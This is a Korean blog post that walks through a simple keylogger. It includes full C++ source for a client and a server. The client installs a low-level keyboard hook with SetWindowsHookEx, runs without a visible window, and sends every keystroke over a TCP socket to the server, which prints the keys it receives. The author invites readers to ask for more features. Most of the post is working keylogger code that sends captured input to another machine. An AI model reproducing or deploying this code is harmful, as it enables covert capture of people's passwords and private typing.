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정말 간단한 키보드 후킹 프로그램을 만들었습니다.
작동 원리는 간단합니다.
1. SetWindowsHookEx() API를 통해서 클라이언트 측 키보드 값을 후킹합니다.
2. 서버 측에 입력받은 키보드 값을 DWORD 형태로 전달합니다.
3. 서버 측에서는 입력받은 키보드 값을 출력해줍니다.
SetWindowsHookEx의 형태는 검색을 해보시면 다양한 자료들을 얻으실 수 있겠지만, 간단하게만 말씀드리면
_hook = SetWindowsHookEx(WH_KEYBOARD_LL, UseFunction, hInstance, NULL); 이런 형식으로 됩니다.
사용할 함수에는 키보드를 입력받았을 때 행동할 함수를 작성하여 넣어주시면 됩니다. 아래는 기본형태입니다.
LRESULT CALLBACK AnyName(int code, WPARAM wParam, LPARAM lParam) { ... }
소켓 통신같은 경우에는 다른 서버 형태 안넣고 그냥 동기형식의 기본 소켓 통신을 사용하였습니다. 아 참고로 클라이언트 측에서 아무 창이 뜨지 않는 이유는 Visual Studio에서 창 형태로 실행시키기 때문입니다.
마지막으로 집가기 1시간 전에 간단하게만 만든거라 정말 조잡합니다. 추후에 좀 더 향상시켜서 코드 추가해 올리도록 노력해보겠습니다. 추가적인 기능 원하시는거 있으시면 댓글 달아주시면 넣어보겠습니다.
클라이언트 코드
더보기
#include <iostream>
#include <WinSock2.h>
#pragma comment(lib, "ws2_32.lib")
#pragma warning(disable:4996)
HHOOK _hook;
#define PORT 3600
#define IP "127.0.0.1"
void NetWorking_Init();
SOCKET sock;
SOCKADDR_IN sock_addr;
LRESULT CALLBACK Keyboard(int code, WPARAM wParam, LPARAM lParam)
{
if (wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN) {
PKBDLLHOOKSTRUCT pKey = (PKBDLLHOOKSTRUCT)lParam;
if (code >= 0 && (int)wParam == 256) {
send(sock, reinterpret_cast<char*>(&pKey->vkCode), sizeof(DWORD), 0);
}
}
return CallNextHookEx(_hook, code, wParam, lParam);
}
void SetHook() {
HMODULE hInstance = GetModuleHandle(NULL);
_hook = SetWindowsHookEx(WH_KEYBOARD_LL, Keyboard, hInstance, NULL);
}
void UnHook() {
UnhookWindowsHookEx(_hook);
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, char*, int nShowCmd)
{
NetWorking_Init();
SetHook();
MSG msg;
while (GetMessage(&msg, 0, 0, 0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
UnHook();
closesocket(sock);
WSACleanup();
}
void NetWorking_Init()
{
WSADATA wsaData;
if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
return;
sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock == INVALID_SOCKET)
return;
ZeroMemory(&sock_addr, sizeof(struct sockaddr_in));
sock_addr.sin_family = AF_INET;
sock_addr.sin_port = htons(PORT);
sock_addr.sin_addr.S_un.S_addr = inet_addr(IP);
if (::connect(sock, reinterpret_cast<SOCKADDR*>(&sock_addr), sizeof(SOCKADDR)))
return;
}
서버 코드
더보기
#include <iostream>
#include <WinSock2.h>
#pragma comment(lib, "ws2_32.lib")
#pragma warning(disable:4996)
using namespace std;
#define PORT 3600
#define IP "127.0.0.1"
void HandleError(const char* cause) {
int errCode = ::WSAGetLastError();
std::cout << cause << "Error Code : " << errCode << std::endl;
}
void NetWorking_Init();
SOCKET listen_s;
SOCKADDR_IN sock_addr;
int main() {
NetWorking_Init();
SOCKADDR_IN client_addr;
SOCKET client_s;
ZeroMemory(&client_addr, sizeof(struct sockaddr_in));
int nAcceptClientInfo = sizeof(struct sockaddr_in);
client_s = accept(listen_s, (struct sockaddr*)&client_addr, &nAcceptClientInfo);
int nReceiveBytes = 0;
printf("New Client Connected : %s\n", inet_ntoa(client_addr.sin_addr));
DWORD buffer;
int recvLen = 0;
while (1) {
recvLen = recv(client_s, reinterpret_cast<char*>(&buffer), sizeof(DWORD), 0);
if (recvLen == 0)
break;
cout << "Data : " << buffer << endl;
}
closesocket(client_s);
closesocket(listen_s);
WSACleanup();
}
void NetWorking_Init()
{
WSADATA wsaData;
SOCKADDR_IN sock_addr;
int addr_len;
if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
HandleError("WSAStartup");
listen_s = socket(AF_INET, SOCK_STREAM, 0);
if (listen_s == INVALID_SOCKET)
HandleError("socket");
ZeroMemory(&sock_addr, sizeof(struct sockaddr_in));
sock_addr.sin_family = AF_INET;
sock_addr.sin_port = htons(PORT);
sock_addr.sin_addr.S_un.S_addr = htonl(INADDR_ANY);
if (bind(listen_s, (struct sockaddr*)&sock_addr, sizeof(struct sockaddr_in)) == SOCKET_ERROR)
{
HandleError("Bind");
return;
}
if (listen(listen_s, 5) == SOCKET_ERROR)
{
HandleError("listen");
return;
}
}
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